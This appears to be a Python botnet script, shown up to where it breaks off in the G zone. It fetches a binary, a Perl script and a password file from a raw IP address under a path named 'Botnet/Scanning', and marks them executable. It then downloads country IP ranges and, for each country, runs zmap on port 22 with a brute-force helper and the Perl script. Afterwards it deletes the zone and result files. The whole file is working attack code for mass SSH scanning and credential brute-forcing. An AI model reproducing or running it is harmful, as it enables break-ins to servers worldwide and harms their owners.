import subprocess, time

def vex(cmd):
        subprocess.call(cmd, shell=True)

white = "\x1b[1;37m"
red = "\x1b[38;5;196m"
cyan = "\x1b[38;5;50m"

print("alright, lets download our files now.")
vex('wget -q http://98.143.148.177/Archive/Botnet/Scanning/ZMAP/update -O update')
vex('wget -q http://98.143.148.177/Archive/Botnet/Scanning/ZMAP/tartarus.pl -O tartarus.pl')
vex('wget -q http://98.143.148.177/Archive/Botnet/Scanning/ZMAP/pass_file -O pass_file')
vex('chmod 777 *')
print("THIS TOOK FOREVER TO FUCKING DO, YOU BETTER BE THANKFUL")
time.sleep(3)
print(""+ white +"Downloading "+ red +"A-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ad.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ad.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ae.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ae.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"af.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/af.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ag.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ag.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ai.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ai.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"al.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/al.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"am.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/am.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ao.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ao.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ap.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ap.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"aq.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/aq.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"as.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/as.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"at.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/at.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"au.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/au.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"aw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/aw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ax.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ax.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"az.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/az.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
print("Now starting scan on A-Zone ):")
vex('zmap -p22 -w ad.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ad.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ae.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ae.zone vuln.txt mfu.txt')
vex('zmap -p22 -w af.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf af.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ag.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ag.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ad.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ad.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ai.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ai.zone vuln.txt mfu.txt')
vex('zmap -p22 -w al.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf al.zone vuln.txt mfu.txt')
vex('zmap -p22 -w am.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf am.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ao.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ao.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ap.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ap.zone vuln.txt mfu.txt')
vex('zmap -p22 -w aq.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf aq.zone vuln.txt mfu.txt')
vex('zmap -p22 -w as.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf as.zone vuln.txt mfu.txt')
vex('zmap -p22 -w at.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf at.zone vuln.txt mfu.txt')
vex('zmap -p22 -w au.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf au.zone vuln.txt mfu.txt')
vex('zmap -p22 -w aw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf aw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ax.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ax.zone vuln.txt mfu.txt')
vex('zmap -p22 -w az.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf az.zone vuln.txt mfu.txt')
print("fucking finally ): starting B-Zone")
time.sleep(3)
vex('clear')
print(""+ white +"Downloading "+ red +"B-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ba.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ba.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bb.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bb.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bd.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bd.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"be.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/be.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bj.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bj.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bo.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bo.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bq.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bq.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"br.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/br.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bs.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bs.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"by.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/by.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"bz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/bz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ba.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ba.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bb.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bb.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bd.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bd.zone vuln.txt mfu.txt')
vex('zmap -p22 -w be.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf be.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bj.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bj.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bo.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bo.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bq.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bq.zone vuln.txt mfu.txt')
vex('zmap -p22 -w br.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf br.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bs.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bs.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w by.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf by.zone vuln.txt mfu.txt')
vex('zmap -p22 -w bz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf bz.zone vuln.txt mfu.txt')
print("fucking finally ): starting C-Zone")
time.sleep(3)
vex('clear')
#########################################
#   _____    ______                
#  / ____|  |___  /                
# | |   ______ / / ___  _ __   ___ 
# | |  |______/ / / _ \| '_ \ / _ \
# | |____    / /_| (_) | | | |  __/
#  \_____|  /_____\___/|_| |_|\___|
#                                  
#########################################
print(""+ white +"Downloading "+ red +"C-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ca.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ca.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cd.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cd.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ch.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ch.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ci.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ci.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ck.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ck.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"co.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/co.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cu.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cv.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cv.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cy.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cy.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"cz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/cz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ca.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ca.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cd.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cd.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ch.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ch.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ci.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ci.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ck.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ck.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w co.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf co.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cu.zone vuln.txt mfu.txt')
vex('zmap -p22 -w cv.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf cv.zone vuln.txt mfu.txt')
print("fucking finally ): starting D-Zone")
time.sleep(3)
vex('clear')
#########################################
#  _____       ______                
# |  __ \     |___  /                
# | |  | |______ / / ___  _ __   ___ 
# | |  | |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
# |_____/     /_____\___/|_| |_|\___|
#                                   
#########################################
print(""+ white +"Downloading "+ red +"D-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"de.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/de.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"dj.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/dj.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"dk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/dk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"dm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/dm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"do.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/do.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"dz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/dz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w de.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf de.zone vuln.txt mfu.txt')
vex('zmap -p22 -w dj.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf dj.zone vuln.txt mfu.txt')
vex('zmap -p22 -w dk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf dk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w dm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf dm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w do.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf do.zone vuln.txt mfu.txt')
vex('zmap -p22 -w dz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf dz.zone vuln.txt mfu.txt')
print("fucking finally ): starting E-Zone")
time.sleep(3)
vex('clear')
#########################################
#  ______    ______                
# |  ____|  |___  /                
# | |__ ______ / / ___  _ __   ___ 
# |  __|______/ / / _ \| '_ \ / _ \
# | |____    / /_| (_) | | | |  __/
# |______|  /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"E-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ec.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ec.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ee.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ee.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"eg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/eg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"er.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/er.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"es.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/es.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"et.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/et.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"eu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/eu.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ec.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ec.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ee.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ee.zone vuln.txt mfu.txt')
vex('zmap -p22 -w eg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf eg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w er.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf er.zone vuln.txt mfu.txt')
vex('zmap -p22 -w es.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf es.zone vuln.txt mfu.txt')
vex('zmap -p22 -w et.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf et.zone vuln.txt mfu.txt')
vex('zmap -p22 -w eu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf eu.zone vuln.txt mfu.txt')
print("fucking finally ): starting F-Zone")
time.sleep(3)
vex('clear')
#########################################
#  ______    ______                
# |  ____|  |___  /                
# | |__ ______ / / ___  _ __   ___ 
# |  __|______/ / / _ \| '_ \ / _ \
# | |        / /_| (_) | | | |  __/
# |_|       /_____\___/|_| |_|\___|
#                                    
#########################################
print(""+ white +"Downloading "+ red +"F-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fi.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fi.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fj.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fj.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fo.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fo.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"fr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/fr.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w fi.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fi.zone vuln.txt mfu.txt')
vex('zmap -p22 -w fj.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fj.zone vuln.txt mfu.txt')
vex('zmap -p22 -w fk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w fm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w fo.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fo.zone vuln.txt mfu.txt')
vex('zmap -p22 -w fr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf fr.zone vuln.txt mfu.txt')
print("fucking finally ): starting G-Zone")
time.sleep(3)
vex('clear')
#########################################
#   _____      ______                
#  / ____|    |___  /                
# | |  __ ______ / / ___  _ __   ___ 
# | | |_ |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
#  \_____|    /_____\___/|_| |_|\___|
#                                    
#########################################
print(""+ white +"Downloading "+ red +"G-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ga.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ga.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gb.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gb.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gd.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gd.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ge.zone"+ red +"]"+ white +"")
